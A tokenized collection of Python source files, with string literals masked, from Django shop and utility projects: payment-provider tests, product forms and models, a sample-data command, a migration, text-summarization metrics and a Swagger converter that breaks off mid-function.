<s> from __future__ import unicode_literals <EOL> import hashlib <EOL> import json <EOL> from decimal import Decimal <EOL> from unittest import TestCase <EOL> from django . http import HttpResponse , HttpResponseForbidden <EOL> from mock import MagicMock , patch <EOL> from . import CoinbaseProvider <EOL> PAYMENT_TOKEN = '<STR_LIT>' <EOL> KEY = '<STR_LIT>' <EOL> SECRET = '<STR_LIT>' <EOL> VARIANT = '<STR_LIT>' <EOL> COINBASE_REQUEST = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:id>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : hashlib . md5 ( ( '<STR_LIT>' % ( <EOL> PAYMENT_TOKEN , KEY ) ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) } } <EOL> class Payment ( object ) : <EOL> id = <NUM_LIT:1> <EOL> description = '<STR_LIT>' <EOL> currency = '<STR_LIT>' <EOL> total = Decimal ( <NUM_LIT:100> ) <EOL> status = '<STR_LIT>' <EOL> token = PAYMENT_TOKEN <EOL> variant = VARIANT <EOL> def change_status ( self , status ) : <EOL> self . status = status <EOL> def get_failure_url ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_process_url ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_purchased_items ( self ) : <EOL> return [ ] <EOL> def save ( self ) : <EOL> return self <EOL> def get_success_url ( self ) : <EOL> return '<STR_LIT>' <EOL> class TestCoinbaseProvider ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . payment = Payment ( ) <EOL> self . provider = CoinbaseProvider ( key = KEY , secret = SECRET ) <EOL> def test_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> request = MagicMock ( ) <EOL> request . body = json . dumps ( COINBASE_REQUEST ) <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponse ) <EOL> self . assertEqual ( self . payment . status , '<STR_LIT>' ) <EOL> def test_incorrect_custom_token_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> data = dict ( COINBASE_REQUEST ) <EOL> data . update ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> request = MagicMock ( ) <EOL> request . body = json . dumps ( data ) <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponseForbidden ) <EOL> def test_incorrect_data_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> request = MagicMock ( ) <EOL> request . POST = { '<STR_LIT:id>' : '<STR_LIT>' } <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponseForbidden ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_provider_returns_checkout_url ( self , mocked_post , mocked_time ) : <EOL> code = '<STR_LIT>' <EOL> signature = '<STR_LIT>' '<STR_LIT>' <EOL> url = '<STR_LIT>' % code <EOL> post = MagicMock ( ) <EOL> post . json = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT:code>' : code } } ) <EOL> post . status_code = <NUM_LIT:200> <EOL> mocked_post . return_value = post <EOL> mocked_time . return_value = <NUM_LIT:1> <EOL> form = self . provider . get_form ( self . payment ) <EOL> self . assertEqual ( form . action , url ) <EOL> self . assertEqual ( <EOL> mocked_post . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , signature ) </s>
<s> from __future__ import unicode_literals <EOL> import time <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . http import HttpResponseForbidden , HttpResponse <EOL> import jwt <EOL> from . forms import PaymentForm , ProcessPaymentForm <EOL> from . . core import BasicProvider <EOL> class GoogleWalletProvider ( BasicProvider ) : <EOL> def __init__ ( self , seller_id , seller_secret , <EOL> library = '<STR_LIT>' , <EOL> ** kwargs ) : <EOL> self . seller_id = seller_id <EOL> self . seller_secret = seller_secret <EOL> self . library = library <EOL> super ( GoogleWalletProvider , self ) . __init__ ( ** kwargs ) <EOL> if not self . _capture : <EOL> raise ImproperlyConfigured ( <EOL> '<STR_LIT>' ) <EOL> def get_jwt_data ( self , payment ) : <EOL> current_time = int ( time . time ( ) ) <EOL> exp_time = current_time + <NUM_LIT> <EOL> jwt_info = { <EOL> '<STR_LIT>' : self . seller_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : current_time , <EOL> '<STR_LIT>' : exp_time , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : payment . currency , <EOL> '<STR_LIT>' : str ( payment . total ) , <EOL> '<STR_LIT:name>' : payment . description or '<STR_LIT>' , <EOL> '<STR_LIT>' : payment . token } } <EOL> return jwt . encode ( jwt_info , self . seller_secret ) <EOL> def get_form ( self , payment , data = None ) : <EOL> kwargs = { <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : payment , <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> return PaymentForm ( ** kwargs ) <EOL> def get_process_form ( self , payment , request ) : <EOL> return ProcessPaymentForm ( payment = payment , provider = self , <EOL> data = request . POST or None ) <EOL> def get_token_from_request ( self , payment , request ) : <EOL> form = self . get_process_form ( payment , request ) <EOL> if form . is_valid ( ) : <EOL> return form . token <EOL> def process_data ( self , payment , request ) : <EOL> form = self . get_process_form ( payment , request ) <EOL> if not form . is_valid ( ) : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> form . save ( ) <EOL> return HttpResponse ( form . order_id ) </s>
<s> from django . core . management . base import BaseCommand <EOL> from django . db import connection <EOL> from ... . userprofile . models import User <EOL> from ... utils . random_data import ( <EOL> create_items , create_orders , create_users , create_shipping_methods ) <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> placeholders_dir = r'<STR_LIT>' <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def make_database_faster ( self ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in connection . settings_dict [ '<STR_LIT>' ] : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> def handle ( self , * args , ** options ) : <EOL> self . make_database_faster ( ) <EOL> create_images = not options [ '<STR_LIT>' ] <EOL> for msg in create_shipping_methods ( ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_items ( self . placeholders_dir , <NUM_LIT> , create_images ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_users ( <NUM_LIT:20> ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_orders ( <NUM_LIT:20> ) : <EOL> self . stdout . write ( msg ) <EOL> if options [ '<STR_LIT>' ] : <EOL> credentials = { '<STR_LIT:email>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> user , created = User . objects . get_or_create ( <EOL> email = credentials [ '<STR_LIT:email>' ] , defaults = { <EOL> '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT>' : True } ) <EOL> if created : <EOL> user . set_password ( credentials [ '<STR_LIT:password>' ] ) <EOL> user . save ( ) <EOL> self . stdout . write ( <EOL> '<STR_LIT>' % credentials ) <EOL> else : <EOL> self . stdout . write ( <EOL> '<STR_LIT>' % credentials ) </s>
<s> from __future__ import unicode_literals <EOL> from django import forms <EOL> from django . db import transaction <EOL> from django . forms . models import ModelChoiceIterator , inlineformset_factory <EOL> from django . utils . translation import pgettext_lazy <EOL> from ... product . models import ( AttributeChoiceValue , Product , ProductAttribute , <EOL> ProductImage , ProductVariant , Stock , <EOL> VariantImage ) <EOL> from . widgets import ImagePreviewWidget <EOL> PRODUCT_CLASSES = { Product : '<STR_LIT>' } <EOL> class ProductClassForm ( forms . Form ) : <EOL> product_cls = forms . ChoiceField ( <EOL> label = pgettext_lazy ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> widget = forms . RadioSelect , <EOL> choices = [ ( cls . __name__ , presentation ) for cls , presentation in <EOL> PRODUCT_CLASSES . items ( ) ] ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductClassForm , self ) . __init__ ( * args , ** kwargs ) <EOL> product_class = next ( iter ( ( PRODUCT_CLASSES ) ) ) <EOL> self . fields [ '<STR_LIT>' ] . initial = product_class . __name__ <EOL> class StockForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Stock <EOL> exclude = [ '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> product = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( StockForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . ModelChoiceField ( <EOL> queryset = product . variants ) <EOL> class ProductForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Product <EOL> exclude = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductForm , self ) . __init__ ( * args , ** kwargs ) <EOL> field = self . fields [ '<STR_LIT:name>' ] <EOL> field . widget . attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> field = self . fields [ '<STR_LIT>' ] <EOL> field . widget . attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> field = self . fields [ '<STR_LIT>' ] <EOL> field . widget . attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> class ProductVariantForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductVariant <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductVariantForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ <EOL> '<STR_LIT>' ] = self . instance . product . price . gross <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ <EOL> '<STR_LIT>' ] = self . instance . product . weight <EOL> class CachingModelChoiceIterator ( ModelChoiceIterator ) : <EOL> def __iter__ ( self ) : <EOL> if self . field . empty_label is not None : <EOL> yield ( '<STR_LIT>' , self . field . empty_label ) <EOL> for obj in self . queryset : <EOL> yield self . choice ( obj ) <EOL> class CachingModelChoiceField ( forms . ModelChoiceField ) : <EOL> def _get_choices ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _choices <EOL> return CachingModelChoiceIterator ( self ) <EOL> choices = property ( _get_choices , forms . ChoiceField . _set_choices ) <EOL> class VariantAttributeForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductVariant <EOL> fields = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( VariantAttributeForm , self ) . __init__ ( * args , ** kwargs ) <EOL> attrs = self . instance . product . attributes . all ( ) <EOL> self . available_attrs = attrs . prefetch_related ( '<STR_LIT>' ) <EOL> for attr in self . available_attrs : <EOL> field_defaults = { '<STR_LIT:label>' : attr . display , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : self . instance . get_attribute ( attr . pk ) } <EOL> if attr . has_values ( ) : <EOL> field = CachingModelChoiceField ( <EOL> queryset = attr . values . all ( ) , ** field_defaults ) <EOL> else : <EOL> field = forms . CharField ( ** field_defaults ) <EOL> self . fields [ attr . get_formfield_name ( ) ] = field <EOL> def save ( self , commit = True ) : <EOL> attributes = { } <EOL> for attr in self . available_attrs : <EOL> value = self . cleaned_data . pop ( attr . get_formfield_name ( ) ) <EOL> attributes [ attr . pk ] = value . pk if hasattr ( value , '<STR_LIT>' ) else value <EOL> self . instance . attributes = attributes <EOL> return super ( VariantAttributeForm , self ) . save ( commit = commit ) <EOL> class VariantBulkDeleteForm ( forms . Form ) : <EOL> items = forms . ModelMultipleChoiceField ( queryset = ProductVariant . objects ) <EOL> def delete ( self ) : <EOL> items = ProductVariant . objects . filter ( <EOL> pk__in = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> items . delete ( ) <EOL> class StockBulkDeleteForm ( forms . Form ) : <EOL> items = forms . ModelMultipleChoiceField ( queryset = Stock . objects ) <EOL> def delete ( self ) : <EOL> items = Stock . objects . filter ( pk__in = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> items . delete ( ) <EOL> class ProductImageForm ( forms . ModelForm ) : <EOL> variants = forms . ModelMultipleChoiceField ( <EOL> queryset = ProductVariant . objects . none ( ) , <EOL> widget = forms . CheckboxSelectMultiple , required = False ) <EOL> class Meta : <EOL> model = ProductImage <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductImageForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if self . instance . product : <EOL> variants = self . fields [ '<STR_LIT>' ] <EOL> variants . queryset = self . instance . product . variants . all ( ) <EOL> variants . initial = self . instance . variant_images . values_list ( <EOL> '<STR_LIT>' , flat = True ) <EOL> if self . instance . image : <EOL> self . fields [ '<STR_LIT:image>' ] . widget = ImagePreviewWidget ( ) <EOL> @ transaction . atomic <EOL> def save_variant_images ( self , instance ) : <EOL> variant_images = [ ] <EOL> instance . variant_images . all ( ) . delete ( ) <EOL> for variant in self . cleaned_data [ '<STR_LIT>' ] : <EOL> variant_images . append ( <EOL> VariantImage ( variant = variant , image = instance ) ) <EOL> VariantImage . objects . bulk_create ( variant_images ) <EOL> def save ( self , commit = True ) : <EOL> instance = super ( ProductImageForm , self ) . save ( commit = commit ) <EOL> self . save_variant_images ( instance ) <EOL> return instance <EOL> class ProductAttributeForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductAttribute <EOL> exclude = [ ] <EOL> AttributeChoiceValueFormset = inlineformset_factory ( <EOL> ProductAttribute , AttributeChoiceValue , exclude = ( ) , extra = <NUM_LIT:1> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django_prices . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RenameField ( <EOL> model_name = '<STR_LIT>' , <EOL> old_name = '<STR_LIT>' , <EOL> new_name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_prices . models . PriceField ( decimal_places = <NUM_LIT:2> , currency = b'<STR_LIT>' , max_digits = <NUM_LIT:12> , blank = True , null = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:255> , db_index = True , blank = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:255> , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . db . models import Max , F <EOL> from django . utils . translation import pgettext_lazy <EOL> from versatileimagefield . fields import VersatileImageField , PPOIField <EOL> from . base import Product <EOL> class ImageManager ( models . Manager ) : <EOL> def first ( self ) : <EOL> try : <EOL> return self . get_queryset ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> pass <EOL> class ProductImage ( models . Model ) : <EOL> product = models . ForeignKey ( Product , related_name = '<STR_LIT>' ) <EOL> image = VersatileImageField ( <EOL> upload_to = '<STR_LIT>' , ppoi_field = '<STR_LIT>' , blank = False ) <EOL> ppoi = PPOIField ( ) <EOL> alt = models . CharField ( <EOL> pgettext_lazy ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> max_length = <NUM_LIT> , blank = True ) <EOL> order = models . PositiveIntegerField ( editable = False ) <EOL> objects = ImageManager ( ) <EOL> class Meta : <EOL> ordering = [ '<STR_LIT>' ] <EOL> app_label = '<STR_LIT>' <EOL> def get_ordering_queryset ( self ) : <EOL> return self . product . images . all ( ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if self . order is None : <EOL> qs = self . get_ordering_queryset ( ) <EOL> existing_max = qs . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> existing_max = existing_max . get ( '<STR_LIT>' ) <EOL> self . order = <NUM_LIT:0> if existing_max is None else existing_max + <NUM_LIT:1> <EOL> super ( ProductImage , self ) . save ( * args , ** kwargs ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> qs = self . get_ordering_queryset ( ) <EOL> qs . filter ( order__gt = self . order ) . update ( order = F ( '<STR_LIT>' ) - <NUM_LIT:1> ) <EOL> super ( ProductImage , self ) . delete ( * args , ** kwargs ) <EOL> class VariantImage ( models . Model ) : <EOL> variant = models . ForeignKey ( '<STR_LIT>' , <EOL> related_name = '<STR_LIT>' ) <EOL> image = models . ForeignKey ( ProductImage , related_name = '<STR_LIT>' ) </s>
<s> from django . core . exceptions import ImproperlyConfigured <EOL> from django . test import TestCase <EOL> from django . test . client import RequestFactory <EOL> from django . test . utils import override_settings <EOL> from responsive . conf import settings <EOL> from responsive . context_processors import device <EOL> from responsive . utils import Device <EOL> class ContextProcessorsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . factory = RequestFactory ( ) <EOL> def test_context_processor_raises_improperlyconfigured_error ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> self . assertRaises ( ImproperlyConfigured , device , request ) <EOL> @ override_settings ( MIDDLEWARE_CLASSES = ( '<STR_LIT>' , ) ) <EOL> def test_context_processor_returns_device_object ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> context = device ( request ) <EOL> self . assertIsInstance ( context [ settings . RESPONSIVE_VARIABLE_NAME ] , Device ) </s>
<s> from django import forms , template <EOL> from users . fields import HoneyPotField <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def is_checkbox ( field ) : <EOL> return isinstance ( field . field . widget , forms . CheckboxInput ) <EOL> @ register . filter <EOL> def input_class ( field ) : <EOL> """<STR_LIT>""" <EOL> return field . field . widget . __class__ . __name__ . lower ( ) <EOL> @ register . filter <EOL> def is_honeypot ( field ) : <EOL> return isinstance ( field . field , HoneyPotField ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from appconf import AppConf <EOL> class DjangoCMSFormsConf ( AppConf ) : <EOL> PLUGIN_MODULE = _ ( '<STR_LIT>' ) <EOL> PLUGIN_NAME = _ ( '<STR_LIT>' ) <EOL> FIELDSETS = None <EOL> FILE_STORAGE_DIR = '<STR_LIT>' <EOL> FILE_STORAGE = settings . DEFAULT_FILE_STORAGE <EOL> ALLOWED_FILE_TYPES = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MAX_UPLOAD_SIZE = <NUM_LIT> <EOL> FIELD_TYPES = ( <EOL> ( '<STR_LIT:text>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:email>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:url>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:file>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:date>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:time>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:password>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_FIELD_TYPE = '<STR_LIT:text>' <EOL> SPAM_PROTECTIONS = ( <EOL> ( <NUM_LIT:0> , _ ( '<STR_LIT:None>' ) ) , <EOL> ( <NUM_LIT:1> , _ ( '<STR_LIT>' ) ) , <EOL> ( <NUM_LIT:2> , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_SPAM_PROTECTION = <NUM_LIT:0> <EOL> RECAPTCHA_PUBLIC_KEY = '<STR_LIT>' <EOL> RECAPTCHA_SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATES = ( <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_TEMPLATE = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> EXPORT_FILENAME = '<STR_LIT>' <EOL> HASHIDS_SALT = settings . SECRET_KEY <EOL> USE_HTML5_REQUIRED = False <EOL> WIDGET_CSS_CLASSES = { } <EOL> class Meta : <EOL> prefix = '<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> from __future__ import division , print_function , unicode_literals <EOL> from . . models import TfDocumentModel as TfModel <EOL> def cosine_similarity ( evaluated_model , reference_model ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( evaluated_model , TfModel ) and isinstance ( reference_model , TfModel ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> terms = frozenset ( evaluated_model . terms ) | frozenset ( reference_model . terms ) <EOL> numerator = <NUM_LIT:0.0> <EOL> for term in terms : <EOL> numerator += evaluated_model . term_frequency ( term ) * reference_model . term_frequency ( term ) <EOL> denominator = evaluated_model . magnitude * reference_model . magnitude <EOL> if denominator == <NUM_LIT:0.0> : <EOL> raise ValueError ( "<STR_LIT>" % ( <EOL> evaluated_model , reference_model ) ) <EOL> return numerator / denominator <EOL> def unit_overlap ( evaluated_model , reference_model ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( evaluated_model , TfModel ) and isinstance ( reference_model , TfModel ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> terms1 = frozenset ( evaluated_model . terms ) <EOL> terms2 = frozenset ( reference_model . terms ) <EOL> if not terms1 and not terms2 : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> common_terms_count = len ( terms1 & terms2 ) <EOL> return common_terms_count / ( len ( terms1 ) + len ( terms2 ) - common_terms_count ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import division , print_function , unicode_literals <EOL> import math <EOL> from . _summarizer import AbstractSummarizer <EOL> from . . utils import get_stop_words <EOL> class SumBasicSummarizer ( AbstractSummarizer ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , document , sentences_count ) : <EOL> sentences = document . sentences <EOL> ratings = self . _compute_ratings ( sentences ) <EOL> return self . _get_best_sentences ( document . sentences , sentences_count , ratings ) <EOL> def _get_all_words_in_doc ( self , sentences ) : <EOL> return [ w for s in sentences for w in s . words ] <EOL> def _get_content_words_in_sentence ( self , sentence ) : <EOL> normalized_words = self . _normalize_words ( sentence . words ) <EOL> normalized_content_words = self . _filter_out_stop_words ( normalized_words ) <EOL> return normalized_content_words <EOL> def _normalize_words ( self , words ) : <EOL> return [ self . normalize_word ( w ) for w in words ] <EOL> def _filter_out_stop_words ( self , words ) : <EOL> return [ w for w in words if w not in self . stop_words ] <EOL> def _compute_word_freq ( self , list_of_words ) : <EOL> word_freq = { } <EOL> for w in list_of_words : <EOL> word_freq [ w ] = word_freq . get ( w , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return word_freq <EOL> def _get_all_content_words_in_doc ( self , sentences ) : <EOL> all_words = self . _get_all_words_in_doc ( sentences ) <EOL> content_words = self . _filter_out_stop_words ( all_words ) <EOL> normalized_content_words = self . _normalize_words ( content_words ) <EOL> return normalized_content_words <EOL> def _compute_tf ( self , sentences ) : <EOL> '''<STR_LIT>''' <EOL> content_words = self . _get_all_content_words_in_doc ( sentences ) <EOL> content_words_count = len ( content_words ) <EOL> content_words_freq = self . _compute_word_freq ( content_words ) <EOL> content_word_tf = dict ( ( k , v / content_words_count ) for ( k , v ) in content_words_freq . items ( ) ) <EOL> return content_word_tf <EOL> def _compute_average_probability_of_words ( self , word_freq_in_doc , content_words_in_sentence ) : <EOL> content_words_count = len ( content_words_in_sentence ) <EOL> if content_words_count > <NUM_LIT:0> : <EOL> word_freq_sum = sum ( [ word_freq_in_doc [ w ] for w in content_words_in_sentence ] ) <EOL> word_freq_avg = word_freq_sum / content_words_count <EOL> return word_freq_avg <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _update_tf ( self , word_freq , words_to_update ) : <EOL> for w in words_to_update : <EOL> word_freq [ w ] *= word_freq [ w ] <EOL> return word_freq <EOL> def _find_index_of_best_sentence ( self , word_freq , sentences_as_words ) : <EOL> min_possible_freq = - <NUM_LIT:1> <EOL> max_value = min_possible_freq <EOL> best_sentence_index = <NUM_LIT:0> <EOL> for i , words in enumerate ( sentences_as_words ) : <EOL> word_freq_avg = self . _compute_average_probability_of_words ( word_freq , words ) <EOL> if ( word_freq_avg > max_value ) : <EOL> max_value = word_freq_avg <EOL> best_sentence_index = i <EOL> return best_sentence_index <EOL> def _compute_ratings ( self , sentences ) : <EOL> word_freq = self . _compute_tf ( sentences ) <EOL> ratings = { } <EOL> sentences_list = list ( sentences ) <EOL> sentences_as_words = [ self . _get_content_words_in_sentence ( s ) for s in sentences ] <EOL> while len ( sentences_list ) > <NUM_LIT:0> : <EOL> best_sentence_index = self . _find_index_of_best_sentence ( word_freq , sentences_as_words ) <EOL> best_sentence = sentences_list . pop ( best_sentence_index ) <EOL> ratings [ best_sentence ] = - <NUM_LIT:1> * len ( ratings ) <EOL> best_sentence_words = sentences_as_words . pop ( best_sentence_index ) <EOL> self . _update_tf ( word_freq , best_sentence_words ) <EOL> return ratings </s>
<s> SCHEMA_APIS = '<STR_LIT>' <EOL> SCHEMA_PATH = '<STR_LIT:path>' <EOL> FILE_EXT_JSON = '<STR_LIT>' <EOL> FILE_EXT_YAML = '<STR_LIT>' <EOL> SWAGGER_FILE_NAMES = [ <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_JSON , <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_JSON , <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_YAML , <EOL> ] <EOL> SCOPE_SEPARATOR = '<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> from ... spec . base import NullContext <EOL> from ... scan import Dispatcher <EOL> from ... errs import SchemaError <EOL> from ... utils import scope_compose , get_or_none <EOL> from ... consts import private <EOL> from ... spec . v1_2 . objects import ( <EOL> ResourceList , <EOL> Resource , <EOL> Operation , <EOL> Authorization , <EOL> Parameter , <EOL> Model , <EOL> ) <EOL> from ... spec . v2_0 import objects <EOL> import os <EOL> import six <EOL> def update_type_and_ref ( dst , src , scope , sep , app ) : <EOL> ref = getattr ( src , '<STR_LIT>' ) <EOL> if ref : <EOL> dst . update_field ( '<STR_LIT>' , '<STR_LIT>' + scope_compose ( scope , ref , sep = sep ) ) <EOL> if app . prim_factory . is_primitive ( getattr ( src , '<STR_LIT:type>' , None ) ) : <EOL> dst . update_field ( '<STR_LIT:type>' , src . type . lower ( ) ) <EOL> elif src . type : <EOL> dst . update_field ( '<STR_LIT>' , '<STR_LIT>' + scope_compose ( scope , src . type , sep = sep ) ) <EOL> def convert_min_max ( dst , src ) : <EOL> def _from_str ( name ) : <EOL> v = getattr ( src , name , None ) <EOL> if v : <EOL> if src . type == '<STR_LIT>' : <EOL> dst . update_field ( name , int ( float ( v ) ) ) <EOL> elif src . type 